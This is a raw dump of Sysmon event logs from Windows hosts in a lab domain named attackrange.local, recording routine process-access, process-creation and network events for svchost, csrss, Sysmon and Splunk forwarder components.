12:23:24.691{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291497Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.691{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291496Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.691{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291495Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.691{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291494Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.691{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291493Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.691{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291492Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.691{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291491Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.691{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291490Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.691{BEA10069-D0C1-6086-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{BEA10069-023C-6088-F829-00000000BB01}6128C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291489Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.691{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-023C-6088-F829-00000000BB01}6128C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291488Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.691{BEA10069-023C-6088-F829-00000000BB01}6128C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000291487Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.490{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1BD5EA13585A9CA673206A28AD144672,SHA256=03DC832F232D423F5EBEAF3F467F0B63D52821AEEB211CD1F6262504CCDD02CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291486Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.011{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-023C-6088-F729-00000000BB01}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291485Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.011{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291484Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.011{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291483Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.011{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291482Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.011{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291481Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.010{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291480Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.010{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291479Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.010{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291478Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.010{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291477Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.010{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291476Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.010{BEA10069-D0C1-6086-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{BEA10069-023C-6088-F729-00000000BB01}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291475Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.010{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-023C-6088-F729-00000000BB01}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291474Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.005{BEA10069-023C-6088-F729-00000000BB01}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000440276Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:20.404{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62399-false10.0.1.12-8089- 10341000x8000000000000000440275Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:24.151{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440274Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:24.151{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 